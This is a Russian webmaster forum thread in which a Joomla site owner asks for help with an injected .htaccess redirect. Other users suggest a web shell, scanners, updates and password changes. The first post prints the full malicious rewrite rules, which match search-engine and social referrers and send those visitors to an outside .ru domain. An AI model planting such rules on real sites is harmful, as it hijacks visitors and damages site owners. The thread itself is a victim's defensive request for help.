X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Зловред редиректит на гугл, абзац..., ----
Bulava11
Bulava11
Topic Starter сообщение 4.9.2012, 10:44; Ответить: Bulava11
Сообщение #1


Участник
***

Группа: User
Сообщений: 220
Регистрация: 16.2.2012
Из: Нижегородская область
Поблагодарили: 43 раза
Репутация:   9  


Братцы, помогите! wacko.gif

Завелся на нашем сайте зловредный редирект и в файле .htaccess во всех каталогах. ПРичем когда его удаляешь и видоизменяешь он сам автоматом прописывается вновь. Самое забавное, что редирект идет на гугль. И если допустим заправшивать наш сайт с гугла, то по ссылке, предложенной в гугле ОПЯТЬ ПОПАДЕШЬ НА ГУГЛ, короче посетителей с гугла потеряли. cms - joomla 1.5. Может кто-то сталкивался, подскажет в каком файлике чего затереить и какие файлики вообще убить. ВОт что прописано в .htaccess:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|ao
l|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|fac
e
book|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|
g
igablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|eu
r
oseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slid
e
r|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodse
a
rch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abac
h
o|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|in
f
ospace)\.(.*)
RewriteRule ^(.*)$ http://installmentultradev.ru/Graphs?8 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|v
oila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|e
n
iro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|e
b
ay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|g
i
mpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simply
h
ired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac
|
findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|k
o
mpass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|sta
r
tsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westau
s
traliaonline)\.(.*)
RewriteRule ^(.*)$ http://installmentultradev.ru/Graphs?8 [R=301,L]
</IfModule>

p.s. Готовы если кто сможет удалить эту заразу оплатить труды.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
BestProxies
BestProxies
сообщение 4.9.2012, 11:06; Ответить: BestProxies
Сообщение #2


Частый гость
**

Группа: User
Сообщений: 62
Регистрация: 13.8.2012
Поблагодарили: 8 раз
Репутация:   1  


Вероятно на хостинге у вас залит веб-шелл, с помощью которого злоумышленники выставляют редирект снова и снова. Необходимо его удалить, попробуйте воспользоваться скриптом айболит


--------------------
Best-Proxies.ru - тысячи проверенных свежих прокси, недорого
Прокси проверяются на работу с Яндекс, Google, Twitter, Mail.ru и на возможность отправки почты


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Frankie
Frankie
сообщение 4.9.2012, 11:11; Ответить: Frankie
Сообщение #3


Старожил
******

Группа: Active User
Сообщений: 1520
Регистрация: 18.9.2009
Поблагодарили: 320 раз
Репутация:   36  


подозреваю дыру, попробуйте систему http://www.siteguard.ru/ заюзать, может она вам скажет где ваш "зловред" поселился


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kstnews
kstnews
сообщение 5.9.2012, 4:49; Ответить: kstnews
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 444
Регистрация: 25.11.2011
Из: Нижегородская губерния
Поблагодарили: 132 раза
Репутация:   31  


Как вариант (если не так давно завелся) - восстановиться из бэкапа, сохраненному перед "заведением".
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
BestProxies
BestProxies
сообщение 5.9.2012, 8:11; Ответить: BestProxies
Сообщение #5


Частый гость
**

Группа: User
Сообщений: 62
Регистрация: 13.8.2012
Поблагодарили: 8 раз
Репутация:   1  


После того как удалите шелл, не забудьте установить все обновления для движка, и сменить пароли админки/ftp/ssh

Сообщение отредактировал BestProxies - 5.9.2012, 8:12


--------------------
Best-Proxies.ru - тысячи проверенных свежих прокси, недорого
Прокси проверяются на работу с Яндекс, Google, Twitter, Mail.ru и на возможность отправки почты


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Bulava11
Bulava11
Topic Starter сообщение 5.9.2012, 8:17; Ответить: Bulava11
Сообщение #6


Участник
***

Группа: User
Сообщений: 220
Регистрация: 16.2.2012
Из: Нижегородская область
Поблагодарили: 43 раза
Репутация:   9  


Как вариант (если не так давно завелся) - восстановиться из бэкапа, сохраненному перед "заведением".


Заметили слишком поздно, в самом раннем бекапе уже присутствует эта пакость.

После того как удалите шелл, не забудьте установить все обновления для движка, и сменить пароли админки/ftp/ssh


Спасибо, учту.

p.s. Спасибо друзья, справился не без вашей помощи.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rxp
Rxp
сообщение 5.9.2012, 22:03; Ответить: Rxp
Сообщение #7


Участник
***


Группа: User
Сообщений: 115
Регистрация: 9.11.2008
Поблагодарили: 21 раз
Репутация:   10  


ТС если повторится обращайтесь проведем полную проверку на все виды вирусов и + дадим рекомендации!


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 10.9.2012, 14:33; Ответить: Electric
Сообщение #8


CMS help/antivirus
******

Группа: Active User
Сообщений: 1532
Регистрация: 27.12.2009
Из: Єдина Україна
Поблагодарили: 389 раз
Репутация:   57  


Попробуйте почитать эту тему, там упоминалась проблема с htaccess и зловредными редиректами.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Увеличение посещаемости сайта (яндекс, гугл, соц сети) - реальные люди
1 SANR 277 Сегодня, 19:12
автор: anchous
Открытая тема (нет новых ответов) Настройка и ведение ваших кампаний по контекстной рекламе Яндекс Директ и Гугл Эдвордс
2 AvramLincoln 458 Сегодня, 13:18
автор: AvramLincoln
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПочему гугл не любит кулинарный сайт?
22 aleggator 2754 10.11.2017, 14:09
автор: Emtec
Горячая тема (нет новых ответов) Гугл жёстко игнорит новый домен
Гугл не индексирует домен
53 nahalturu 6770 12.10.2017, 14:00
автор: vvovvo
Открытая тема (нет новых ответов) Промо код Гугл Эдвордс 2000 рублей
Может кому то будет нужен
3 alllffa 847 9.10.2017, 12:12
автор: alllffa


 



RSS Текстовая версия Сейчас: 11.12.2017, 21:23
Дизайн